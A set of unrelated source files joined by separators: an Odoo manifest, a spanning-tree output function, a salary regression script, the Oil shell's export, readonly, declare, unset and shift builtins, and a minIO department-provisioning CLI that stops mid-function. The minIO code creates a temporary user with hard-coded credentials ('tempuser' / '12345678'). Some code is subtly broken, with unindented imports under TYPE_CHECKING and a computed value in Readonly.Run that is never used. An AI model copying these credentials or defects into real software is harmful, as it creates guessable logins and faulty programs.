{
    'name': 'Dogma Partner Fields',
    'version': '13.0.1.4.0',
    'author': 'HomebrewSoft',
    'website': 'https://github.com/HomebrewSoft/dogma_partner_fields',
    'category': 'Operations',
    # Modules that must be installed before this one.
    'depends': [
        'sms',
    ],
    # Data files loaded on install/upgrade.
    'data': [
        'views/res_partner.xml',
    ],
}
|
def SalvarArvoreGeradoraMinimaEmArquivo(arquivoDeSaida, arvoreGeradoraMinima):
    """Write each minimum-spanning-tree edge to the output file, one
    'fonte/destino/peso' (source/target/weight) line per edge."""
    linhas = [
        'fonte: {}, destino: {}, peso: {}\n'.format(
            aresta['source'], aresta['target'], aresta['weight'])
        for aresta in arvoreGeradoraMinima
    ]
    with open(arquivoDeSaida, 'w') as arquivo:
        arquivo.writelines(linhas)
print("isso ai")
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
# Simple Linear Regression: linear dependency between Salary & Years of Experience.
# Machine is: Simple Linear Regression Model.
# Learning is: we train the model on the training set; it learns the
# correlations of the training set to be able to make future predictions.

# Importing dataset
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

# Splitting dataset into training and testing sets
dataset=pd.read_csv('Salary_Data.csv')
x=dataset.iloc[:, :-1].values   # x is a feature matrix (years of experience)
y=dataset.iloc[:, 1].values     # y is the target vector (salary)

# To get reproducible results we keep random_state=0.
# BUG FIX: sklearn.cross_validation was removed in scikit-learn 0.20;
# train_test_split now lives in sklearn.model_selection.
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=1/3,random_state=0)
# In simple linear regression, feature scaling is not required — it is taken
# care of by the scikit-learn library.

# Fitting simple linear regression to the training set.
from sklearn.linear_model import LinearRegression
regressor =LinearRegression()
# Fit the regressor to the training data; the fitted regressor is our model.
regressor.fit(x_train,y_train)

# Predicting test set results: y_pred holds the predicted salaries,
# y_test the real salaries from the dataset.
y_pred=regressor.predict(x_test)

# Visualising the training set (plot titles kept as in the original output).
plt.scatter(x_train,y_train,color='red')
plt.plot(x_train,regressor.predict(x_train),color='blue')
plt.title('Salary vrs Experience(treaining set)')
plt.xlabel('Exeperience')
plt.ylabel('Salary')
plt.show()

# Visualising the test set against the line fitted on the training data.
plt.scatter(x_test,y_test,color='red')
plt.plot(x_train,regressor.predict(x_train),color='blue')
plt.title('Salary vrs Experience(treaining set)')
plt.xlabel('Exeperience')
plt.ylabel('Salary')
plt.show()
|
#!/usr/bin/env python2
"""
builtin_assign.py
"""
from __future__ import print_function
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import builtin_i
from _devbuild.gen.runtime_asdl import (
value, value_e, value_t, value__Bool, value__Str, value__MaybeStrArray,
value__AssocArray,
lvalue, scope_e, cmd_value__Argv, cmd_value__Assign, assign_arg,
)
from core import error
from core.pyerror import e_usage, log
from core import state
from core import vm
from frontend import flag_spec
from frontend import args
from mycpp import mylib
from osh import sh_expr_eval
from osh import cmd_eval
from qsn_ import qsn
from typing import cast, Optional, Dict, List, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import Proc
from core.state import Mem
from core.ui import ErrorFormatter
from frontend.args import _Attributes
_ = log
# Which builtin is asking to print variables; used by _PrintVariables to
# filter cells (readonly shows only readonly cells, export only exported).
_OTHER = 0
_READONLY = 1
_EXPORT = 2
def _PrintVariables(mem, cmd_val, attrs, print_flags, builtin=_OTHER):
  # type: (Mem, cmd_value__Assign, _Attributes, bool, int) -> int
  """Print shell variables in 'declare -p' style, honoring filter flags.

  Args:
    print_flags: whether to print flags
    builtin: is it the readonly or export builtin?

  Returns 0 if all requested names were printed (or everything was printed),
  1 otherwise (e.g. a name was missing or given with an invalid '=' form).
  """
  flag = attrs.attrs

  # Turn dynamic vars to static.
  tmp_g = flag.get('g')
  tmp_a = flag.get('a')
  tmp_A = flag.get('A')

  flag_g = cast(value__Bool, tmp_g).b if tmp_g and tmp_g.tag_() == value_e.Bool else False
  flag_a = cast(value__Bool, tmp_a).b if tmp_a and tmp_a.tag_() == value_e.Bool else False
  flag_A = cast(value__Bool, tmp_A).b if tmp_A and tmp_A.tag_() == value_e.Bool else False

  tmp_n = flag.get('n')
  tmp_r = flag.get('r')
  tmp_x = flag.get('x')

  #log('FLAG %r', flag)

  # SUBTLE: export -n vs. declare -n. flag vs. OPTION.
  # flags are value.Bool, while options are Undef or Str.
  # '+', '-', or None
  flag_n = cast(value__Str, tmp_n).s if tmp_n and tmp_n.tag_() == value_e.Str else None  # type: Optional[str]
  flag_r = cast(value__Str, tmp_r).s if tmp_r and tmp_r.tag_() == value_e.Str else None  # type: Optional[str]
  flag_x = cast(value__Str, tmp_x).s if tmp_x and tmp_x.tag_() == value_e.Str else None  # type: Optional[str]

  # Decide which scopes to search based on the builtin and -g.
  if cmd_val.builtin_id == builtin_i.local:
    if flag_g and not mem.IsGlobalScope():
      return 1
    which_scopes = scope_e.LocalOnly
  elif flag_g:
    which_scopes = scope_e.GlobalOnly
  else:
    which_scopes = mem.ScopesForReading()  # reading

  if len(cmd_val.pairs) == 0:
    print_all = True
    cells = mem.GetAllCells(which_scopes)
    names = sorted(cells)  # type: List[str]
  else:
    print_all = False
    names = []
    cells = {}
    for pair in cmd_val.pairs:
      name = pair.var_name
      if pair.rval and pair.rval.tag_() == value_e.Str:
        # Invalid: declare -p foo=bar
        # Add a sentinel so we skip it, but know to exit with status 1.
        s = cast(value__Str, pair.rval).s
        invalid = "%s=%s" % (name, s)
        names.append(invalid)
        cells[invalid] = None
      else:
        names.append(name)
        cells[name] = mem.GetCell(name, which_scopes)

  count = 0
  for name in names:
    cell = cells[name]
    if cell is None: continue  # Invalid
    val = cell.val
    #log('name %r %s', name, val)

    # Apply the builtin- and flag-based filters before printing.
    if val.tag_() == value_e.Undef: continue
    if builtin == _READONLY and not cell.readonly: continue
    if builtin == _EXPORT and not cell.exported: continue
    if flag_n == '-' and not cell.nameref: continue
    if flag_n == '+' and cell.nameref: continue
    if flag_r == '-' and not cell.readonly: continue
    if flag_r == '+' and cell.readonly: continue
    if flag_x == '-' and not cell.exported: continue
    if flag_x == '+' and cell.exported: continue
    if flag_a and val.tag_() != value_e.MaybeStrArray: continue
    if flag_A and val.tag_() != value_e.AssocArray: continue

    # Build the output line as a list of string pieces.
    decl = []  # type: List[str]
    if print_flags:
      flags = []  # type: List[str]
      if cell.nameref: flags.append('n')
      if cell.readonly: flags.append('r')
      if cell.exported: flags.append('x')
      if val.tag_() == value_e.MaybeStrArray:
        flags.append('a')
      elif val.tag_() == value_e.AssocArray:
        flags.append('A')
      if len(flags) == 0: flags.append('-')

      decl.extend(["declare -", ''.join(flags), " ", name])
    else:
      decl.append(name)

    if val.tag_() == value_e.Str:
      str_val = cast(value__Str, val)
      decl.extend(["=", qsn.maybe_shell_encode(str_val.s)])
    elif val.tag_() == value_e.MaybeStrArray:
      array_val = cast(value__MaybeStrArray, val)
      # mycpp rewrite: None in array_val.strs
      has_holes = False
      for s in array_val.strs:
        if s is None:
          has_holes = True
          break
      if has_holes:
        # Note: Arrays with unset elements are printed in the form:
        #   declare -p arr=(); arr[3]='' arr[4]='foo' ...
        decl.append("=()")
        first = True
        for i, element in enumerate(array_val.strs):
          if element is not None:
            if first:
              decl.append(";")
              first = False
            decl.extend([" ", name, "[", str(i), "]=",
                         qsn.maybe_shell_encode(element)])
      else:
        # Dense array: print all elements inside =( ... ).
        body = []  # type: List[str]
        for element in array_val.strs:
          if len(body) > 0: body.append(" ")
          body.append(qsn.maybe_shell_encode(element))
        decl.extend(["=(", ''.join(body), ")"])
    elif val.tag_() == value_e.AssocArray:
      assoc_val = cast(value__AssocArray, val)
      # Keys are sorted for deterministic output.
      body = []
      for key in sorted(assoc_val.d):
        if len(body) > 0: body.append(" ")
        key_quoted = qsn.maybe_shell_encode(key, flags=qsn.MUST_QUOTE)
        value_quoted = qsn.maybe_shell_encode(assoc_val.d[key])
        body.extend(["[", key_quoted, "]=", value_quoted])
      if len(body) > 0:
        decl.extend(["=(", ''.join(body), ")"])
    else:
      pass  # note: other types silently ignored

    print(''.join(decl))
    count += 1

  if print_all or count == len(names):
    return 0
  else:
    return 1
def _ExportReadonly(mem, pair, flags):
  # type: (Mem, assign_arg, int) -> None
  """ For 'export' and 'readonly' to respect += and flags.

  Like 'setvar' (scope_e.LocalOnly), unless dynamic scope is on.  That is, it
  respects shopt --unset dynamic_scope.

  Used for assignment builtins, (( a = b )), {fd}>out, ${x=}, etc.
  """
  which_scopes = mem.ScopesForWriting()

  lval = lvalue.Named(pair.var_name)
  if pair.plus_eq:
    old_val = sh_expr_eval.OldValue(lval, mem, None)  # ignore set -u
    # When 'export e+=', then rval is value.Str('')
    # When 'export foo', the pair.plus_eq flag is false.
    assert pair.rval is not None
    val = cmd_eval.PlusEquals(old_val, pair.rval)
  else:
    # NOTE: when rval is None, only flags are changed
    val = pair.rval

  mem.SetValue(lval, val, which_scopes, flags=flags)
class Export(vm._AssignBuiltin):
    """The 'export' builtin: set variables and mark them exported."""

    def __init__(self, mem, errfmt):
        # type: (Mem, ErrorFormatter) -> None
        self.mem = mem
        self.errfmt = errfmt

    def Run(self, cmd_val):
        # type: (cmd_value__Assign) -> int
        arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
        arg_r.Next()
        attrs = flag_spec.Parse('export_', arg_r)
        arg = arg_types.export_(attrs.attrs)

        if arg.f:
            e_usage(
                "doesn't accept -f because it's dangerous. "
                "(The code can usually be restructured with 'source')")

        # -p, or no assignments at all, means print the exported variables.
        if arg.p or len(cmd_val.pairs) == 0:
            return _PrintVariables(self.mem, cmd_val, attrs, True, builtin=_EXPORT)

        if arg.n:
            # -n removes the export flag; an RHS makes no sense here.
            for pair in cmd_val.pairs:
                if pair.rval is not None:
                    e_usage("doesn't accept RHS with -n", span_id=pair.spid)
                # NOTE: we don't care if it wasn't found, like bash.
                self.mem.ClearFlag(pair.var_name, state.ClearExport)
            return 0

        for pair in cmd_val.pairs:
            _ExportReadonly(self.mem, pair, state.SetExport)
        return 0
def _ReconcileTypes(rval, flag_a, flag_A, span_id):
    # type: (Optional[value_t], bool, bool, int) -> value_t
    """Check that -a and -A flags are consistent with RHS.

    Special case: () is allowed to mean empty indexed array or empty assoc
    array if the context is clear.

    Shared between NewVar and Readonly.
    """
    if flag_a and rval is not None and rval.tag_() != value_e.MaybeStrArray:
        e_usage("Got -a but RHS isn't an array", span_id=span_id)

    if not flag_A or not rval:
        return rval

    # Special case: 'declare -A A=()' is OK.  The empty () literal parses as
    # an indexed array, so reinterpret it as an empty associative array.
    if rval.tag_() == value_e.MaybeStrArray:
        array_val = cast(value__MaybeStrArray, rval)
        if len(array_val.strs) == 0:
            return value.AssocArray({})

    if rval.tag_() != value_e.AssocArray:
        e_usage("Got -A but RHS isn't an associative array", span_id=span_id)

    return rval
class Readonly(vm._AssignBuiltin):
    """The 'readonly' builtin: mark variables read-only, optionally assigning."""

    def __init__(self, mem, errfmt):
        # type: (Mem, ErrorFormatter) -> None
        self.mem = mem
        self.errfmt = errfmt

    def Run(self, cmd_val):
        # type: (cmd_value__Assign) -> int
        arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
        arg_r.Next()
        attrs = flag_spec.Parse('readonly', arg_r)
        arg = arg_types.readonly(attrs.attrs)

        # -p, or no assignments at all, means print the readonly variables.
        if arg.p or len(cmd_val.pairs) == 0:
            return _PrintVariables(self.mem, cmd_val, attrs, True, builtin=_READONLY)

        for pair in cmd_val.pairs:
            if pair.rval is not None:
                rval = pair.rval  # type: Optional[value_t]
            elif arg.a:
                # 'readonly -a x' with no RHS creates an empty indexed array.
                rval = value.MaybeStrArray([])
            elif arg.A:
                # 'readonly -A x' with no RHS creates an empty assoc array.
                rval = value.AssocArray({})
            else:
                rval = None  # only flags are changed

            # Validates the -a / -A flags against the RHS (may call e_usage).
            rval = _ReconcileTypes(rval, arg.a, arg.A, pair.spid)

            # Dynamic scope because flags on locals can be changed, etc.
            _ExportReadonly(self.mem, pair, state.SetReadOnly)
        return 0
class NewVar(vm._AssignBuiltin):
    """declare/typeset/local."""

    def __init__(self, mem, procs, errfmt):
        # type: (Mem, Dict[str, Proc], ErrorFormatter) -> None
        self.mem = mem
        self.procs = procs
        self.errfmt = errfmt

    def _PrintFuncs(self, names):
        # type: (List[str]) -> int
        """Print each proc name that exists; status 1 if any name is missing."""
        status = 0
        for name in names:
            if name in self.procs:
                print(name)
                # TODO: Could print LST for -f, or render LST.  Bash does
                # this.  'trap' could use that too.
            else:
                status = 1
        return status

    def Run(self, cmd_val):
        # type: (cmd_value__Assign) -> int
        arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
        arg_r.Next()
        attrs = flag_spec.Parse('new_var', arg_r)
        arg = arg_types.new_var(attrs.attrs)

        status = 0

        if arg.f:
            names = arg_r.Rest()
            if len(names):
                # This is only used for a STATUS QUERY now.  We only show the
                # name, not the body.
                status = self._PrintFuncs(names)
            else:
                # Disallow this since it would be incompatible.
                e_usage('with -f expects function names')
            return status

        if arg.F:
            names = arg_r.Rest()
            if len(names):
                status = self._PrintFuncs(names)
            else:
                # bash quirk: with no names, they're printed in a different
                # format!
                for func_name in sorted(self.procs):
                    print('declare -f %s' % (func_name))
            return status

        if arg.p:  # Lookup and print variables.
            return _PrintVariables(self.mem, cmd_val, attrs, True)
        elif len(cmd_val.pairs) == 0:
            return _PrintVariables(self.mem, cmd_val, attrs, False)

        #
        # Set variables
        #

        if cmd_val.builtin_id == builtin_i.local:
            which_scopes = scope_e.LocalOnly
        else:  # declare/typeset
            if arg.g:
                which_scopes = scope_e.GlobalOnly
            else:
                which_scopes = scope_e.LocalOnly

        # Translate -x/-r/-n (and their '+' counterparts) into flag bits.
        # (Removed an unused 'flags_to_clear = 0' local from the original;
        # the Clear* bits are accumulated into 'flags' as well.)
        flags = 0
        if arg.x == '-':
            flags |= state.SetExport
        if arg.r == '-':
            flags |= state.SetReadOnly
        if arg.n == '-':
            flags |= state.SetNameref
        if arg.x == '+':
            flags |= state.ClearExport
        if arg.r == '+':
            flags |= state.ClearReadOnly
        if arg.n == '+':
            flags |= state.ClearNameref

        for pair in cmd_val.pairs:
            rval = pair.rval
            # declare -a foo=(a b); declare -a foo; should not reset to an
            # empty array, so only create one when no compatible value exists.
            if rval is None and (arg.a or arg.A):
                old_val = self.mem.GetValue(pair.var_name)
                if arg.a:
                    if old_val.tag_() != value_e.MaybeStrArray:
                        rval = value.MaybeStrArray([])
                elif arg.A:
                    if old_val.tag_() != value_e.AssocArray:
                        rval = value.AssocArray({})

            lval = lvalue.Named(pair.var_name)

            if pair.plus_eq:
                old_val = sh_expr_eval.OldValue(lval, self.mem, None)  # ignore set -u
                # When 'typeset e+=', then rval is value.Str('')
                # When 'typeset foo', the pair.plus_eq flag is false.
                assert pair.rval is not None
                rval = cmd_eval.PlusEquals(old_val, pair.rval)
            else:
                rval = _ReconcileTypes(rval, arg.a, arg.A, pair.spid)

            self.mem.SetValue(lval, rval, which_scopes, flags=flags)

        return status
# TODO:
# - It would make more sense to treat no args as an error (bash doesn't.)
# - Should we have strict builtins? Or just make it stricter?
class Unset(vm._Builtin):
    """The 'unset' builtin: remove variables and/or procs."""

    def __init__(self, mem, procs, unsafe_arith, errfmt):
        # type: (Mem, Dict[str, Proc], sh_expr_eval.UnsafeArith, ErrorFormatter) -> None
        self.mem = mem
        self.procs = procs
        self.unsafe_arith = unsafe_arith
        self.errfmt = errfmt

    def _UnsetVar(self, arg, spid, proc_fallback):
        # type: (str, int, bool) -> bool
        """
        Returns:
          bool: whether the 'unset' builtin should succeed with code 0.
        """
        # The argument may be an indexed expression like 'a[i]', so it is
        # parsed into an lvalue rather than used as a plain name.
        lval = self.unsafe_arith.ParseLValue(arg, spid)

        #log('lval %s', lval)
        found = False
        try:
            found = self.mem.Unset(lval, scope_e.Shopt)
        except error.Runtime as e:
            # note: in bash, myreadonly=X fails, but declare myreadonly=X
            # doesn't fail because it's a builtin.  So I guess the same is
            # true of 'unset'.
            e.span_id = spid
            self.errfmt.PrettyPrintError(e)
            return False

        if proc_fallback and not found:
            # No variable by that name: fall back to erasing a proc of the
            # same name (best-effort; no error if absent).
            mylib.dict_erase(self.procs, arg)

        return True

    def Run(self, cmd_val):
        # type: (cmd_value__Argv) -> int
        attrs, arg_r = flag_spec.ParseCmdVal('unset', cmd_val)
        arg = arg_types.unset(attrs.attrs)

        argv, arg_spids = arg_r.Rest2()
        for i, name in enumerate(argv):
            spid = arg_spids[i]
            if arg.f:
                # -f: remove functions only.
                mylib.dict_erase(self.procs, name)
            elif arg.v:
                # -v: remove variables only.
                if not self._UnsetVar(name, spid, False):
                    return 1
            else:
                # proc_fallback: Try to delete var first, then func.
                if not self._UnsetVar(name, spid, True):
                    return 1

        return 0
class Shift(vm._Builtin):
    """The 'shift' builtin: drop leading positional parameters."""

    def __init__(self, mem):
        # type: (Mem) -> None
        self.mem = mem

    def Run(self, cmd_val):
        # type: (cmd_value__Argv) -> int
        argc = len(cmd_val.argv) - 1
        if argc == 0:
            amount = 1  # default: shift by one
        elif argc == 1:
            raw = cmd_val.argv[1]
            try:
                amount = int(raw)
            except ValueError:
                e_usage("Invalid shift argument %r" % raw)
        else:
            e_usage('got too many arguments')
        return self.mem.Shift(amount)
|
"""Extra admin commands to manage the DomiNode minIO server
This script adds some functions to perform DomiNode related tasks in a more
expedite manner than using the bare minio client `mc`.
"""
import json
import shlex
import subprocess
import tempfile
import typing
from contextlib import contextmanager
from pathlib import Path
from os import fdopen
import typer
from enum import Enum
from .constants import (
DepartmentName,
UserRole
)
_help_intro = 'Manage minIO server'

# Typer application that groups all DomiNode minIO management commands.
app = typer.Typer(
    short_help=_help_intro,
    help=(
        # Fixed: the wrapped literals were missing a space between 'the' and
        # 'minIO', rendering as '...Check out theminIO client docs...'.
        f'{_help_intro} - Be sure to install minio CLI client (mc) before '
        f'using this. Also, create a \'~/.mc/config.json\' file with the '
        f'credentials of the minIO server that you want to use. Check out '
        f'the minIO client docs at: \n\n'
        f'https://docs.min.io/docs/minio-client-quickstart-guide.html\n\n'
        f'for details on how to download mc and configure it.'
    )
)

SUCCESS = "success"  # status value mc reports in its JSON output on success
DEFAULT_CONFIG_DIR = Path('~/.mc').expanduser()  # mc's default config location
class DomiNodeDepartment:
    """Encapsulates one department's minIO buckets, groups and policies.

    All remote work is delegated to the ``mc`` client via the module-level
    execute_command() / execute_admin_command() helpers.
    """

    name: str                 # department name (taken from DepartmentName.value)
    endpoint_alias: str       # mc alias of the target minIO server
    minio_client_config_dir: Path = DEFAULT_CONFIG_DIR
    dominode_staging_bucket: str = 'dominode-staging'  # shared staging bucket
    public_bucket: str = 'public'                      # shared public bucket
    _policy_version: str = '2012-10-17'  # AWS IAM policy-language version

    def __init__(
            self,
            name: DepartmentName,
            endpoint_alias: str,
            minio_client_config_dir: typing.Optional[Path] = None
    ):
        self.name = name.value
        self.endpoint_alias = endpoint_alias
        if minio_client_config_dir is not None:
            self.minio_client_config_dir = minio_client_config_dir

    @property
    def staging_bucket(self) -> str:
        """Name of the department-private staging bucket."""
        return f'{self.name}-staging'

    @property
    def dominode_staging_root_dir(self) -> str:
        """Department's directory inside the shared staging bucket."""
        return f'{self.dominode_staging_bucket}/{self.name}/'

    @property
    def production_bucket_root_dir(self) -> str:
        """Department's directory inside the shared public bucket."""
        return f'{self.public_bucket}/{self.name}/'

    @property
    def regular_users_group(self) -> str:
        """minIO group holding the department's regular users."""
        return f'{self.name}-user'

    @property
    def editors_group(self) -> str:
        """minIO group holding the department's editors."""
        return f'{self.name}-editor'

    @property
    def regular_user_policy(self) -> typing.Tuple[str, typing.Dict]:
        """(policy name, policy document) for regular department users.

        Grants full access to the department's staging areas, read-only
        access elsewhere, and denies deleting the shared buckets.
        """
        return (
            f'{self.name}-regular-user-group-policy',
            {
                'Version': self._policy_version,
                'Statement': [
                    {
                        'Sid': f'{self.name}-regular-user-deny-bucket-delete',
                        'Action': [
                            's3:DeleteBucket',
                        ],
                        'Effect': 'Deny',
                        'Resource': [
                            f'arn:aws:s3:::{self.dominode_staging_bucket}',
                            f'arn:aws:s3:::{self.staging_bucket}',
                        ]
                    },
                    {
                        'Sid': f'{self.name}-regular-user-full-access',
                        'Action': [
                            's3:*'
                        ],
                        'Effect': 'Allow',
                        'Resource': [
                            f'arn:aws:s3:::{self.dominode_staging_root_dir}*',
                            f'arn:aws:s3:::{self.staging_bucket}/*',
                        ]
                    },
                    {
                        'Sid': f'{self.name}-regular-user-read-only',
                        'Action': [
                            's3:GetBucketLocation',
                            's3:ListBucket',
                            's3:GetObject',
                        ],
                        'Effect': 'Allow',
                        'Resource': [
                            f'arn:aws:s3:::{self.dominode_staging_bucket}/*',
                            f'arn:aws:s3:::{self.public_bucket}/*'
                        ]
                    },
                ]
            }
        )

    @property
    def editor_user_policy(self) -> typing.Tuple[str, typing.Dict]:
        """(policy name, policy document) for department editors.

        Like the regular-user policy, but editors may also write to the
        department's directory in the public (production) bucket.
        """
        return (
            f'{self.name}-editor-group-policy',
            {
                'Version': self._policy_version,
                'Statement': [
                    {
                        'Sid': f'{self.name}-editor-user-deny-bucket-delete',
                        'Action': [
                            's3:DeleteBucket',
                        ],
                        'Effect': 'Deny',
                        'Resource': [
                            f'arn:aws:s3:::{self.dominode_staging_bucket}',
                            f'arn:aws:s3:::{self.staging_bucket}',
                        ]
                    },
                    {
                        'Sid': f'{self.name}-editor-full-access',
                        'Action': [
                            's3:*'
                        ],
                        'Effect': 'Allow',
                        'Resource': [
                            f'arn:aws:s3:::{self.staging_bucket}/*',
                            f'arn:aws:s3:::{self.dominode_staging_root_dir}*',
                            f'arn:aws:s3:::{self.production_bucket_root_dir}*',
                        ]
                    },
                    {
                        'Sid': f'{self.name}-editor-read-only',
                        'Action': [
                            's3:GetBucketLocation',
                            's3:ListBucket',
                            's3:GetObject',
                        ],
                        'Effect': 'Allow',
                        'Resource': [
                            f'arn:aws:s3:::{self.dominode_staging_bucket}/*',
                            f'arn:aws:s3:::{self.public_bucket}/*'
                        ]
                    },
                ]
            }
        )

    def create_groups(self):
        """Ensure both department groups exist on the server."""
        create_group(
            self.endpoint_alias,
            self.regular_users_group,
            self.minio_client_config_dir
        )
        create_group(
            self.endpoint_alias,
            self.editors_group,
            self.minio_client_config_dir
        )

    def create_buckets(self):
        """Create the department's buckets/directories (idempotent)."""
        extra = '--ignore-existing'
        self._execute_command('mb', f'{self.staging_bucket} {extra}')
        # NOTE(review): 'mb' on a path like 'dominode-staging/<dept>/' creates
        # a bucket plus prefix -- confirm this is what mc does here.
        self._execute_command('mb', f'{self.dominode_staging_root_dir} {extra}')
        self._execute_command(
            'mb', f'{self.production_bucket_root_dir} {extra}')

    def create_policies(self):
        """Register both group policies on the server."""
        self.add_policy(*self.regular_user_policy)
        self.add_policy(*self.editor_user_policy)

    def add_policy(self, name: str, policy: typing.Dict):
        """Add policy to the server (no-op when a policy with *name* exists)."""
        existing_policies = self._execute_admin_command('policy list')
        for item in existing_policies:
            if item.get('policy') == name:
                break  # policy already exists
        else:
            # mc reads policies from a file, so write the document to a
            # temporary file and delete it afterwards.
            os_file_handler, pathname = tempfile.mkstemp(text=True)
            with fdopen(os_file_handler, mode='w') as fh:
                json.dump(policy, fh)
            self._execute_admin_command(
                'policy add',
                f'{name} {pathname}',
            )
            Path(pathname).unlink(missing_ok=True)

    def set_policies(self):
        """Attach the group policies and make production publicly readable."""
        self.set_policy(self.regular_user_policy[0], self.regular_users_group)
        self.set_policy(self.editor_user_policy[0], self.editors_group)
        self._set_public_policy()

    def _set_public_policy(self):
        """Allow anonymous downloads from the department's production dir."""
        self._execute_command(
            'policy set download',
            f'{self.production_bucket_root_dir}*'
        )

    def set_policy(
            self,
            policy: str,
            group: str,
    ):
        """Attach an existing server policy to a group."""
        self._execute_admin_command(
            'policy set',
            f'{policy} group={group}',
        )

    def add_user(
            self,
            access_key: str,
            secret_key: str,
            role: typing.Optional[UserRole] = UserRole.REGULAR_DEPARTMENT_USER
    ):
        """Create a user and add it to the group matching *role*.

        Returns True when mc reports the group addition succeeded.
        """
        create_user(
            self.endpoint_alias,
            access_key,
            secret_key,
            minio_client_config_dir=self.minio_client_config_dir
        )
        # Map the role onto the corresponding department group.
        group = {
            UserRole.REGULAR_DEPARTMENT_USER: self.regular_users_group,
            UserRole.EDITOR: self.editors_group,
        }[role]
        addition_result = self._execute_admin_command(
            'group add', f'{group} {access_key}',)
        return addition_result[0].get('status') == SUCCESS

    def _execute_command(
            self,
            command: str,
            arguments: typing.Optional[str] = None,
    ):
        """Run a plain mc command against this department's endpoint."""
        return execute_command(
            self.endpoint_alias,
            command,
            arguments,
            self.minio_client_config_dir
        )

    def _execute_admin_command(
            self,
            command: str,
            arguments: typing.Optional[str] = None,
    ):
        """Run an 'mc admin' command against this department's endpoint."""
        return execute_admin_command(
            self.endpoint_alias,
            command,
            arguments,
            self.minio_client_config_dir
        )
@app.command()
def add_department_user(
        endpoint_alias: str,
        access_key: str,
        secret_key: str,
        department_name: DepartmentName,
        role: typing.Optional[UserRole] = UserRole.REGULAR_DEPARTMENT_USER,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Create a user and add it to the relevant department groups

    This function shall ensure that when a new user is created it is put in
    the relevant groups and with the correct access policies.
    """
    dept = DomiNodeDepartment(
        department_name, endpoint_alias, minio_client_config_dir)
    return dept.add_user(access_key, secret_key, role)
@app.command()
def add_department(
        endpoint_alias: str,
        name: DepartmentName,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Add a new department

    This includes:

    - Adding department staging bucket
    - Adding department groups
    """
    dept = DomiNodeDepartment(name, endpoint_alias, minio_client_config_dir)
    # Run the full provisioning sequence: groups, buckets, policies, bindings.
    for step in (dept.create_groups, dept.create_buckets,
                 dept.create_policies, dept.set_policies):
        step()
@app.command()
def bootstrap(
        endpoint_alias: str,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Perform initial bootstrap of the minIO server

    This function will take care of creating the relevant buckets, groups and
    access controls for using the minIO server for DomiNode.
    """
    # Provision every known department in turn.
    for department_name in DepartmentName:
        add_department(endpoint_alias, department_name, minio_client_config_dir)
def create_group(
        endpoint_alias: str,
        group: str,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.Optional[str]:
    """Ensure *group* exists on the server.

    Returns the group name when it exists (or was created), None when
    creation failed.
    """
    existing_groups = execute_admin_command(
        endpoint_alias,
        'group list',
        minio_client_config_dir=minio_client_config_dir
    )
    if any(entry.get('name') == group for entry in existing_groups):
        return group  # nothing to do

    # minio does not allow creating empty groups, so create it by adding a
    # short-lived temporary user that is removed again afterwards.
    with get_temp_user(endpoint_alias, minio_client_config_dir) as user:
        temp_access_key = user[0]
        creation_result = execute_admin_command(
            endpoint_alias,
            'group add',
            f'{group} {temp_access_key}',
            minio_client_config_dir=minio_client_config_dir
        )
    if creation_result[0].get('status') == SUCCESS:
        return group
    return None
def remove_group(
        endpoint_alias: str,
        group: str,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Delete *group* on the server; True when mc reports success."""
    outcome = execute_admin_command(
        endpoint_alias, 'group remove', group, minio_client_config_dir)
    first_record = outcome[0]
    return first_record.get('status') == SUCCESS
def create_temp_user(
        endpoint_alias: str,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.Optional[typing.Tuple[str, str]]:
    """Create a throwaway user, returning (access_key, secret_key) or None.

    NOTE(review): the credentials are hard-coded and predictable; the user
    is expected to be deleted right after use (see get_temp_user), but
    random credentials via the ``secrets`` module would be safer -- confirm.
    """
    access_key = 'tempuser'
    secret_key = '12345678'
    was_created = create_user(
        endpoint_alias,
        access_key,
        secret_key,
        force=True,
        minio_client_config_dir=minio_client_config_dir
    )
    return (access_key, secret_key) if was_created else None
@contextmanager
def get_temp_user(
        endpoint_alias: str,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Context manager yielding (access_key, secret_key) of a temporary user.

    The user is removed again on exit.  Raises RuntimeError when the user
    could not be created.  (The original silently skipped the yield in that
    case, which made @contextmanager raise an opaque "generator didn't
    yield" RuntimeError; the exception type is preserved but the message is
    now explicit.)
    """
    user_creds = create_temp_user(endpoint_alias, minio_client_config_dir)
    if user_creds is None:
        raise RuntimeError('Could not create temporary minIO user')
    access_key, secret_key = user_creds
    try:
        yield user_creds
    finally:
        # Always clean the temporary user up, even if the body raised.
        execute_admin_command(
            endpoint_alias,
            'user remove',
            access_key,
            minio_client_config_dir=minio_client_config_dir
        )
def create_user(
        endpoint_alias: str,
        access_key: str,
        secret_key: str,
        force: bool = False,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> bool:
    """Create a minIO user, returning True when the user exists afterwards.

    Raises RuntimeError when *secret_key* is shorter than 8 characters.
    Improvements over the original: the secret-key validation now happens
    BEFORE the remote 'user list' call (no pointless round trip on invalid
    input), and an unreachable final 'else' branch was removed.
    """
    if len(secret_key) < 8:
        raise RuntimeError(
            'Please choose a secret key with 8 or more characters')

    # minio allows overwriting users with the same access_key, so we check
    # whether the user exists first.
    existing_users = execute_admin_command(
        endpoint_alias,
        'user list',
        minio_client_config_dir=minio_client_config_dir
    )
    user_already_exists = any(
        entry.get('accessKey') == access_key for entry in existing_users)

    if user_already_exists and not force:
        # TODO: should log that the user was not recreated
        return True

    creation_result = execute_admin_command(
        endpoint_alias,
        'user add',
        f'{access_key} {secret_key}',
        minio_client_config_dir=minio_client_config_dir
    )
